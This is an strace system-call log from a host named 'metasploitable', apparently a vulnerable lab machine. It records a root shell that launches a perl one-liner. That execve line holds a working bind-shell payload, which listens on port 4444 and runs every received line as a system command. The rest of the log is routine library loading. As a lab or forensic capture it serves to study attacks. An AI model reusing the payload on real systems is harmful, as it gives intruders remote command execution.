12763 07:44:01.616704 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d94000

12763 07:44:01.616715 mmap2(0xb7da8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7da8000

12763 07:44:01.616730 mmap2(0xb7daa000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7daa000

12763 07:44:01.616745 close(1)          = 0

12763 07:44:01.616771 munmap(0xb7f3a000, 29913) = 0

12763 07:44:01.616789 open("/etc/ld.so.cache", O_RDONLY) = 1

12763 07:44:01.616801 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12763 07:44:01.616818 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f3a000

12763 07:44:01.616827 close(1)          = 0

12763 07:44:01.616838 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12763 07:44:01.616853 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12763 07:44:01.616867 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12763 07:44:01.616956 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12763 07:44:01.616973 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8a000

12763 07:44:01.616984 mmap2(0xb7d92000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d92000

12763 07:44:01.617001 close(1)          = 0

12763 07:44:01.617013 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12763 07:44:01.617026 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12763 07:44:01.617044 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12763 07:44:01.617193 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12763 07:44:01.617210 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7f000

12763 07:44:01.617221 mmap2(0xb7d88000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d88000

12763 07:44:01.617237 close(1)          = 0

12763 07:44:01.617258 munmap(0xb7f3a000, 29913) = 0

12763 07:44:01.617273 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12763 07:44:01.617287 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12763 07:44:01.617298 _llseek(1, 0, [0], SEEK_CUR) = 0

12763 07:44:01.617310 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12763 07:44:01.617326 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f41000

12763 07:44:01.617336 _llseek(1, 1624, [1624], SEEK_SET) = 0

12763 07:44:01.617351 munmap(0xb7f41000, 1624) = 0

12763 07:44:01.617360 close(1)          = 0

12763 07:44:01.617388 getpgrp()         = 3831

12763 07:44:01.617398 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12763 07:44:01.617412 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12763 07:44:01.617428 brk(0x8101000)    = 0x8101000

12763 07:44:01.617458 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12763 07:44:01.617472 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12763 07:44:01.617487 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12763 07:44:01.617523 brk(0x8102000)    = 0x8102000

12763 07:44:01.617595 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12763 07:44:01.617632 stat64("/sbin/AB", 0xbf9fa858) = -1 ENOENT (No such file or directory)

12763 07:44:01.617659 stat64("/bin/AB", 0xbf9fa858) = -1 ENOENT (No such file or directory)

12763 07:44:01.617670 stat64("/usr/sbin/AB", 0xbf9fa858) = -1 ENOENT (No such file or directory)

12763 07:44:01.617681 stat64("/usr/bin/AB", 0xbf9fa858) = -1 ENOENT (No such file or directory)

12763 07:44:01.617694 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12763 07:44:01.617709 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db56f8) = 12764

12764 07:44:01.617753 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12764 07:44:01.617769 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12764 07:44:01.617782 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12764 07:44:01.617794 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12764 07:44:01.617809 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12764 07:44:01.617824 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12764 07:44:01.617836 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12764 07:44:01.617890 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12764 07:44:01.617903 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12764 07:44:01.617969 exit_group(127)   = ?

4519  07:44:01.622942 waitpid(12763,  <unfinished ...>

12763 07:44:01.633072 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12763 07:44:01.633203 --- SIGCHLD (Child exited) @ 0 (0) ---

12763 07:44:01.633261 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12764

12763 07:44:01.633309 waitpid(-1, 0xbf9fa4d8, WNOHANG) = -1 ECHILD (No child processes)

12763 07:44:01.633337 sigreturn()       = ? (mask now [])

12763 07:44:01.633373 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12763 07:44:01.633395 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12763 07:44:01.633406 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12763 07:44:01.633418 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12763 07:44:01.633436 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12763 07:44:01.633448 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12763 07:44:01.633483 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12763 07:44:01.633503 stat64("/sbin/perl", 0xbf9fa888) = -1 ENOENT (No such file or directory)

12763 07:44:01.633516 stat64("/bin/perl", 0xbf9fa888) = -1 ENOENT (No such file or directory)

12763 07:44:01.633527 stat64("/usr/sbin/perl", 0xbf9fa888) = -1 ENOENT (No such file or directory)

12763 07:44:01.633539 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12763 07:44:01.633557 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12763 07:44:01.633582 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12763 07:44:01.633597 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db56f8) = 12765

12765 07:44:01.652641 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12765 07:44:01.652803 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12765 07:44:01.652867 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12765 07:44:01.652905 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12765 07:44:01.652936 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12765 07:44:01.652963 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12765 07:44:01.652979 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12765 07:44:01.653017 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12765 07:44:01.653113 brk(0)            = 0x8153000

12765 07:44:01.663181 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12765 07:44:01.663254 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f1e000

12765 07:44:01.663297 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12765 07:44:01.663331 open("/etc/ld.so.cache", O_RDONLY) = 1

12765 07:44:01.663355 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12765 07:44:01.663380 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f16000

12765 07:44:01.663392 close(1)          = 0

12765 07:44:01.663404 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12765 07:44:01.663419 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12765 07:44:01.663434 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12765 07:44:01.663535 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12765 07:44:01.663553 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f12000

12765 07:44:01.663566 mmap2(0xb7f14000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f14000

12765 07:44:01.663583 close(1)          = 0

12765 07:44:01.663594 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12765 07:44:01.663608 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12765 07:44:01.663622 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12765 07:44:01.663841 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12765 07:44:01.663860 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eed000

12765 07:44:01.663872 mmap2(0xb7f10000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f10000

12765 07:44:01.663889 close(1)          = 0

12765 07:44:01.663901 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12765 07:44:01.663916 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12765 07:44:01.663944 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12765 07:44:01.664031 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12765 07:44:01.664048 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eec000

12765 07:44:01.664061 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ed4000

12765 07:44:01.664072 mmap2(0xb7ee8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ee8000

12765 07:44:01.664086 mmap2(0xb7eea000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eea000

12765 07:44:01.664104 close(1)          = 0

12765 07:44:01.664116 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12765 07:44:01.664129 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12765 07:44:01.664143 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12765 07:44:01.664239 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12765 07:44:01.664285 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d85000

12765 07:44:01.664297 mmap2(0xb7ece000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ece000

12765 07:44:01.664327 mmap2(0xb7ed1000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ed1000

12765 07:44:01.664341 close(1)          = 0

12765 07:44:01.664353 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12765 07:44:01.664367 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12765 07:44:01.664381 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12765 07:44:01.664472 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12765 07:44:01.664489 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d53000

12765 07:44:01.664500 mmap2(0xb7d5c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d5c000

12765 07:44:01.664514 mmap2(0xb7d5e000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d5e000

12765 07:44:01.664528 close(1)          = 0

12765 07:44:01.664552 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d52000

12765 07:44:01.664565 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d528c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12765 07:44:01.664626 mprotect(0xb7ece000, 4096, PROT_READ) = 0

12765 07:44:01.664653 munmap(0xb7f16000, 29913) = 0

12765 07:44:01.664670 set_tid_address(0xb7d52908) = 12765

12765 07:44:01.664680 set_robust_list(0xb7d52910, 0xc) = 0

12765 07:44:01.664689 futex(0xbfe7b310, 0x81 /* FUTEX_??? */, 1) = 0

12765 07:44:01.664704 rt_sigaction(SIGRTMIN, {0xb7ed82c0, [], SA_SIGINFO}, NULL, 8) = 0

12765 07:44:01.664725 rt_sigaction(SIGRT_1, {0xb7ed8340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12765 07:44:01.664740 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

12765 07:44:01.664781 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

12765 07:44:01.664816 uname({sys="Linux", node="metasploitable", ...}) = 0

12765 07:44:01.664863 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

12765 07:44:01.664909 brk(0)            = 0x8153000

12765 07:44:01.664919 brk(0x8174000)    = 0x8174000

12765 07:44:01.664963 getuid32()        = 0

12765 07:44:01.664973 geteuid32()       = 0

12765 07:44:01.664983 getgid32()        = 0

12765 07:44:01.664992 getegid32()       = 0

12765 07:44:01.665029 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d31000

12765 07:44:01.665058 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

12765 07:44:01.665075 read(1, "\357\235(\234", 4) = 4

12765 07:44:01.665089 close(1)          = 0

12765 07:44:01.665107 time(NULL)        = 1495626241

12765 07:44:01.665149 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfe7afe0) = -1 ENOENT (No such file or directory)

12765 07:44:01.665167 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfe7afe0) = -1 ENOENT (No such file or directory)

